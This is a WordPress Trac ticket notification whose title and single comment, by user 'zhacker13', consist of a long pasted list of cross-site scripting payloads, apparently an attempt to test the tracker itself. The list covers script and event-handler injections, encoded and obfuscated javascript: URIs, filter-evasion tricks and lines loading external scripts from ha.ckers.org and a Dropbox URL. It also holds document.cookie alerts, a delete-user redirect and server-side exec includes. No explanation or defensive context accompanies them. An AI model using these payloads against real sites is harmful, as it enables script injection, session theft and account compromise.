[wp-trac] [WordPress Trac] #47899: <iframe src=j&NewLine; &Tab; a&NewLine; &Tab; &Tab; v&NewLine; &Tab; &Tab; &Tab; a&NewLine; &Tab; &Tab; &Tab; &Tab; s&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; c&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; r&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; i&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; p&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; t&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &colon; a&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; l&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; e&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; r&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; t&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; 28&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; 1&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; %29></iframe>

WordPress Trac noreply at wordpress.org
Sun Aug 18 23:39:52 UTC 2019


#47899: <iframe
src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>
--------------------------+------------------------------
 Reporter:  zhacker13     |       Owner:  (none)
     Type:  defect (bug)  |      Status:  new
 Priority:  normal        |   Milestone:  Awaiting Review
Component:  General       |     Version:
 Severity:  normal        |  Resolution:
 Keywords:                |     Focuses:
--------------------------+------------------------------

Comment (by zhacker13):

 <script>alert(123);</script>
 <ScRipT>alert("XSS");</ScRipT>
 <script>alert(123)</script>
 <script>alert("hellox worldss");</script>
 <script>alert(�XSS�)</script>
 <script>alert(�XSS�);</script>
 <script>alert(�XSS�)</script>
 �><script>alert(�XSS�)</script>
 <script>alert(/XSS�)</script>
 <script>alert(/XSS/)</script>
 </script><script>alert(1)</script>
 �; alert(1);
 �)alert(1);//
 <ScRiPt>alert(1)</sCriPt>
 <IMG SRC=jAVasCrIPt:alert(�XSS�)>
 <IMG SRC=�javascript:alert(�XSS�);�>
 <IMG SRC=javascript:alert("XSS")>
 <IMG SRC=javascript:alert(�XSS�)>
 <img src=xss onerror=alert(1)>


 <iframe %00 src="	javascript:prompt(1)	"%00>

 <svg><style>{font-family:'<iframe/onload=confirm(1)>'

 <input/onmouseover="javaSCRIPT:confirm(1)"

 <sVg><scRipt %00>alert(1) {Opera}

 <img/src=`%00` onerror=this.onerror=confirm(1)

 <form><isindex formaction="javascript:confirm(1)"

 <img src=`%00`
 onerror=alert(1)


 <script/	 src='https://dl.dropbox.com/u/13018058/js.js'
 /	></script>

 <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?

 <iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

 <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/

 "><h1/onmouseover='\u0061lert(1)'>%00

 <iframe/src="data:text/html,<svg onload=alert(1)>">

 <meta content="
 1 
; JAVASCRIPT: alert(1)" http-
 equiv="refresh"/>

 <svg><script
 xlink:href=data:,window.open('https://www.google.com/')></script

 <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}

 <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
 <iframe src=javascript:alert(document.location)>

 <form><a href="javascript:\u0061lert&#x28;1&#x29;">X

 </script><img/*%00/src="worksinchrome:prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'>
 <img/	
 src=`~` onerror=prompt(1)>
 <form><iframe 	

 src="javascript:alert(1)"
	;>

 <a href="data:application/x-x509-user-
 cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	
>X</a

 http://www.google<script .com>alert(document.location)</script

 <a href=[�]"�
 onmouseover=prompt(1)//">XYZ</a

 <img/src=@ 
 onerror = prompt('1')

 <style/onload=prompt('XSS')

 <script ^__^>alert(String.fromCharCode(49))</script ^__^

 </style  ><script   :-(>/**/alert(document.location)/**/</script
   :-(

 �</form><input type="date" onfocus="alert(1)">

 <form><textarea 
 onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>

 <script
 /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script
 /***/

 <iframe srcdoc='<body onload=prompt(1)>'>

 <a href="javascript:void(0)"
 onmouseover=
javascript:alert(1)
>X</a>

 <script ~~~>alert(0%0)</script ~~~>

 <style/onload=<!--	>
alert
(1)>

 <///style///><span %2F onmousemove='alert(1)'>SPAN

 <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)

 "><svg><style>{-o-link-source:'<body/onload=confirm(1)>'

 
<blink/
 onmouseover=pr&#x6F;mpt(1)>OnMouseOver {Firefox &
 Opera}

 <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^

 <div/style="width:expression(confirm(1))">X</div> {IE7}

 <iframe/%00/ src=javaSCRIPT:alert(1)

 //<form/action=javascript&#x3A;alert(document.cookie)><input/type='submit'>//

 /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>

 //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\
 </script //|\\

 </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>

 <a/href="javascript:
 javascript:prompt(1)"><input type="X">

 </plaintext\></|\><plaintext/onmouseover=prompt(1)

 </svg>''<svg><script
 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}

 <a href="javascript:\u0061&#x6C;&#101%72t(1)"><button>

 <div onmouseover='alert(1)'>DIV</div>

 <iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%"
 onmouseover="prompt(1)">

 <a href="jAvAsCrIpT:alert(1)">X</a>

 <embed
 src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">

 <object
 data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">

 <var onmouseover="prompt(1)">On Mouse Over</var>

 <a href=javascript:alert(document.cookie)>Click
 Here</a>

 <img src="/" =_=" title="onerror='prompt(1)'">

 <%<!--'%><script>alert(1);</script -->

 <script src="data:text/javascript,alert(1)"></script>
 <iframe/src \/\/onload = prompt(1)

 <iframe/onreadystatechange=alert(1)

 <svg/onload=alert(1)

 <input value=<><iframe/src=javascript:confirm(1)

 <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>

 http://www.<script>alert(1)</script .com

 <iframe
 src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>

 <svg><script ?>alert(1)

 <iframe
 src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>

 <img src=`xx:xx`onerror=alert(1)>

 <meta http-equiv="refresh" content="0;javascript:alert(1)"/>
 <math><a xlink:href="//jsfiddle.net/t846h/">click

 <embed code="http://businessinfo.co.uk/labs/xss/xss.swf"
 allowscriptaccess=always>
 <svg contentScriptType=text/vbs><script>MsgBox+1

 <a
 href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a

 <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061')
 worksinIE>

 <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~
 \u0074\u0068\u0069\u0073.
 \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+

 <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script
 a=\u0061 & /=%2F
 <script/src=data:text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script

 <object data=javascript:\u0061&#x6C;&#101%72t(1)>

 <script>+-+-1-+-+alert(1)</script>

 <body/onload=<!-->&#10alert(1)>

 <script itworksinallbrowsers>/*<script* */alert(1)</script

 <img src ?itworksonchrome?\/onerror = alert(1)

 <svg><script>//
confirm(1);</script </svg>
 <svg><script onlypossibleinopera:-)> alert(1)

 <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa
 href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe

 <script x> alert(1) </script 1=2

 <div/onmouseover='alert(1)'> style="x:">

 <--`<img/src=` onerror=alert(1)> --!>
 <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>

 <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%"
 onmouseover="prompt(1)" onclick="alert(1)">x</button>

 "><img src=x onerror=window.open('https://www.google.com/');>

 <form><button formaction=javascript:alert(1)>CLICKME

 <math><a xlink:href="//jsfiddle.net/t846h/">click

 <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>

 <iframe
 src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>

 <a
 href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click
 Me</a>

 <SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
 �;alert(String.fromCharCode(88,83,83))//�;alert(String.fromCharCode(88,83,83))//�;alert(String.fromCharCode(88,83,83))//�;alert(String.fromCharCode(88,83,83))//�></SCRIPT>�>�><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
 <IMG ���><SCRIPT>alert(�XSS�)</SCRIPT>�>
 <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
 <IMG SRC=�jav ascript:alert(�XSS�);�>
 <IMG SRC=�jav&#x09;ascript:alert(�XSS�);�>
 <<SCRIPT>alert(�XSS�);//<</SCRIPT>
 %253cscript%253ealert(1)%253c/script%253e
 �><s�%2b�cript>alert(document.cookie)</script>
 foo<script>alert(1)</script>
 <scr<script>ipt>alert(1)</scr</script>ipt>
 <IMG
 SRC=javascript:alert('XSS')>
 <IMG
 SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
 <IMG
 SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
 <BODY BACKGROUND=�javascript:alert(�XSS�)�>
 <BODY ONLOAD=alert(�XSS�)>
 <INPUT TYPE=�IMAGE� SRC=�javascript:alert(�XSS�);�>
 <IMG SRC=�javascript:alert(�XSS�)�
 <iframe src=http://ha.ckers.org/scriptlet.html <
 javascript:alert("hellox worldss")
 <img src="javascript:alert('XSS');">
 <img src=javascript:alert("XSS")>
 <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
 <META HTTP-EQUIV="refresh"
 CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
 <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
 <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH
 A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv
 MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs
 aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
 IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh
 TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml"
 AllowScriptAccess="always"></EMBED>
 <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
 <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
 <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
 <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
 <SCRIPT>document.write("<SCRI");</SCRIPT>PT
 SRC="http://ha.ckers.org/xss.js"></SCRIPT>
 <<SCRIPT>alert("XSS");//<</SCRIPT>
 <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
 ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
 <script>alert("hellox
 worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
 <script>alert("XSS");</script>&search=1
 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT
 >&submit-frmGoogleWeb=Web+Search
 <h1><font color=blue>hellox worldss</h1>
 <BODY ONLOAD=alert('hellox worldss')>
 <input onfocus=write(XSS) autofocus>
 <input onblur=write(XSS) autofocus><input autofocus>
 <body
 onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input
 autofocus>
 <form><button formaction="javascript:alert(XSS)">lol
 <!--<img src="--><img src=x onerror=alert(XSS)//">
 <![><img src="]><img src=x onerror=alert(XSS)//">
 <style><img src="</style><img src=x onerror=alert(XSS)//">
 <? foo="><script>alert(1)</script>">
 <! foo="><script>alert(1)</script>">
 </ foo="><script>alert(1)</script>">
 <? foo="><x foo='?><script>alert(1)</script>'>">
 <! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>">
 <% foo><x foo="%><script>alert(123)</script>">
 <div style="font-family:'foo
;color:red;';">LOL
 LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>
 <script>({0:#0=alert/#0#/#0#(0)})</script>
 <svg
 xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg>
 <SCRIPT>alert(/XSS/.source)</SCRIPT>
 \\";alert('XSS');//
 </TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>
 <INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">
 <BODY BACKGROUND=\"javascript:alert('XSS')\">
 <BODY ONLOAD=alert('XSS')>
 <IMG DYNSRC=\"javascript:alert('XSS')\">
 <IMG LOWSRC=\"javascript:alert('XSS')\">
 <BGSOUND SRC=\"javascript:alert('XSS');\">
 <BR SIZE=\"&{alert('XSS')}\">
 <LAYER
 SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>
 <LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">
 <LINK REL=\"stylesheet\"
 HREF=\"http://ha.ckers.org/xss.css\">
 <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
 <META HTTP-EQUIV=\"Link\"
 Content=\"<http://ha.ckers.org/xss.css>;
 REL=stylesheet\">
 <STYLE>BODY{-moz-
 binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>
 <XSS STYLE=\"behavior: url(xss.htc);\">
 <STYLE>li {list-style-image:
 url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
 <IMG SRC='vbscript:msgbox(\"XSS\")'>
 <IMG SRC=\"mocha:[code]\">
 <IMG SRC=\"livescript:[code]\">
 �scriptualert(EXSSE)�/scriptu
 <META HTTP-EQUIV=\"refresh\"
 CONTENT=\"0;url=javascript:alert('XSS');\">
 <META HTTP-EQUIV=\"refresh\"
 CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">
 <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;
 URL=http://;URL=javascript:alert('XSS');\"
 <IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>
 <FRAMESET><FRAME
 SRC=\"javascript:alert('XSS');\"></FRAMESET>
 <TABLE BACKGROUND=\"javascript:alert('XSS')\">
 <TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">
 <DIV STYLE=\"background-image:
 url(javascript:alert('XSS'))\">
 <DIV STYLE=\"background-
 image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\">
 <DIV STYLE=\"background-image:
 url(javascript:alert('XSS'))\">
 <DIV STYLE=\"width: expression(alert('XSS'));\">
 <STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE>
 <IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">
 <XSS STYLE=\"xss:expression(alert('XSS'))\">
 exp/*<A STYLE='no\xss:noxss(\"*//*\");
 xss:ex&#x2F;*XSS*//*/*/pression(alert(\"XSS\"))'>
 <STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>
 <STYLE>.XSS{background-
 image:url(\"javascript:alert('XSS')\");}</STYLE><A
 CLASS=XSS></A>
 <STYLE
 type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>
 <!--[if gte IE 4]>
 <SCRIPT>alert('XSS');</SCRIPT>
 <![endif]-->
 <BASE HREF=\"javascript:alert('XSS');//\">
 <OBJECT TYPE=\"text/x-scriptlet\"
 DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>
 <OBJECT classid=clsid:ae24fdae-
 03c6-11d1-8b76-0080c744f389><param name=url
 value=javascript:alert('XSS')></OBJECT>
 <EMBED SRC=\"http://ha.ckers.org/xss.swf\"
 AllowScriptAccess=\"always\"></EMBED>
 <EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH
 A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv
 MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs
 aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
 IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh
 TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\"
 AllowScriptAccess=\"always\"></EMBED>
 a=\"get\";
 b=\"URL(\\"\";
 c=\"javascript:\";
 d=\"alert('XSS');\\")\";
 eval(a+b+c+d);
 <HTML xmlns:xss><?import namespace=\"xss\"
 implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML>
 <XML ID=I><X><C><![CDATA[<IMG
 SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]>
 </C></X></xml><SPAN DATASRC=#I DATAFLD=C
 DATAFORMATAS=HTML></SPAN>
 <XML ID=\"xss\"><I><B><IMG SRC=\"javas<!--
 -->cript:alert('XSS')\"></B></I></XML>
 <SPAN DATASRC=\"#xss\" DATAFLD=\"B\"
 DATAFORMATAS=\"HTML\"></SPAN>
 <XML SRC=\"xsstest.xml\" ID=I></XML>
 <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
 <HTML><BODY>
 <?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-
 com:time\">
 <?import namespace=\"t\" implementation=\"#default#time2\">
 <t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT
 DEFER>alert("XSS")</SCRIPT>\">
 </BODY></HTML>
 <SCRIPT
 SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>
 <!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo
 'IPT
 SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"-->
 <? echo('<SCR)';
 echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>
 <IMG
 SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">
 Redirect 302 /a.jpg
 http://victimsite.com/admin.asp&deleteuser
 <META HTTP-EQUIV=\"Set-Cookie\"
 Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">
 <HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html;
 charset=UTF-7\"> </HEAD>+ADw-
 SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
 <SCRIPT a=\">\"
 SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
 <SCRIPT =\">\"
 SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
 <SCRIPT a=\">\" ''
 SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
 <SCRIPT \"a='>'\"
 SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
 <SCRIPT a=`>`
 SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
 <SCRIPT a=\">'>\"
 SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
 <SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT
 SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
 <A HREF=\"http://66.102.7.147/\">XSS</A>
 <A
 HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A>
 <A HREF=\"http://1113982867/\">XSS</A>
 <A
 HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>
 <A
 HREF=\"http://0102.0146.0007.00000223/\">XSS</A>
 <A HREF=\"htt p://6
 6.000146.0x7.147/\">XSS</A>
 <A HREF=\"//www.google.com/\">XSS</A>
 <A HREF=\"//google\">XSS</A>
 <A HREF=\"http://ha.ckers.org at google\">XSS</A>
 <A HREF=\"http://google:ha.ckers.org\">XSS</A>
 <A HREF=\"http://google.com/\">XSS</A>
 <A HREF=\"http://www.google.com./\">XSS</A>
 <A
 HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A>
 <A
 HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XSS</A>
 <
 %3C
 &lt
 <
 &LT
 <
 &#60
 &#060
 &#0060
 &#00060
 &#000060
 &#0000060
 <
 &#x3c
 &#x03c
 &#x003c
 &#x0003c
 &#x00003c
 &#x000003c
 &#x3c;
 &#x03c;
 &#x003c;
 &#x0003c;
 &#x00003c;
 &#x000003c;
 &#X3c
 &#X03c
 &#X003c
 &#X0003c
 &#X00003c
 &#X000003c
 &#X3c;
 &#X03c;
 &#X003c;
 &#X0003c;
 &#X00003c;
 &#X000003c;
 &#x3C
 &#x03C
 &#x003C
 &#x0003C
 &#x00003C
 &#x000003C
 &#x3C;
 &#x03C;
 &#x003C;
 &#x0003C;
 &#x00003C;
 &#x000003C;
 &#X3C
 &#X03C
 &#X003C
 &#X0003C
 &#X00003C
 &#X000003C
 &#X3C;
 &#X03C;
 &#X003C;
 &#X0003C;
 &#X00003C;
 &#X000003C;
 \x3c
 \x3C
 \u003c
 \u003C
 <iframe src=http://ha.ckers.org/scriptlet.html>
 <IMG SRC=\"javascript:alert('XSS')\"
 <SCRIPT SRC=//ha.ckers.org/.js>
 <SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
 <<SCRIPT>alert(\"XSS\");//<</SCRIPT>
 <SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
 <BODY
 onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")>
 <SCRIPT/XSS
 SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
 <IMG SRC=\"   javascript:alert('XSS');\">
 perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";'
 > out
 perl -e 'print \"<IMG SRC=java\0script:alert(\\"XSS\\")>\";'
 > out
 <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">
 <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">
 <IMG SRC=\"jav&#x09;ascript:alert('XSS');\">
 <IMG
 SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
 <IMG
 SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
 <IMG SRC=javascript:alert('XSS')>
 <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
 <IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">
 <IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>
 <IMG SRC=javascript:alert("XSS")>
 <IMG SRC=JaVaScRiPt:alert('XSS')>
 <IMG SRC=javascript:alert('XSS')>
 <IMG SRC=\"javascript:alert('XSS');\">
 <SCRIPT
 SRC=http://ha.ckers.org/xss.js></SCRIPT>
 '';!--\"<XSS>=&{()}
 ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
 ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
 '';!--"<XSS>=&{()}
 <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
 <IMG SRC="javascript:alert('XSS');">
 <IMG SRC=javascript:alert('XSS')>
 <IMG SRC=javascrscriptipt:alert('XSS')>
 <IMG SRC=JaVaScRiPt:alert('XSS')>
 <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
 <IMG SRC="   javascript:alert('XSS');">
 <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
 <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
 <<SCRIPT>alert("XSS");//<</SCRIPT>
 <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
 \";alert('XSS');//
 </TITLE><SCRIPT>alert("XSS");</SCRIPT>
 �script�alert(�XSS�)�/script�
 <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
 <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
 <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
 <TABLE BACKGROUND="javascript:alert('XSS')">
 <TABLE><TD BACKGROUND="javascript:alert('XSS')">
 <DIV STYLE="background-image: url(javascript:alert('XSS'))">
 <DIV STYLE="background-
 image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
 <DIV STYLE="width: expression(alert('XSS'));">
 <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
 <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
 <XSS STYLE="xss:expression(alert('XSS'))">
 exp/*<A
 STYLE='no\xss:noxss("*//*");xss:ex&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
 <EMBED SRC="http://ha.ckers.org/xss.swf"
 AllowScriptAccess="always"></EMBED>
 a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
 <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
 <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-
 com:time"><?import namespace="t" implementation="#default#time2"><t:set
 attributeName="innerHTML" to="XSS<SCRIPT
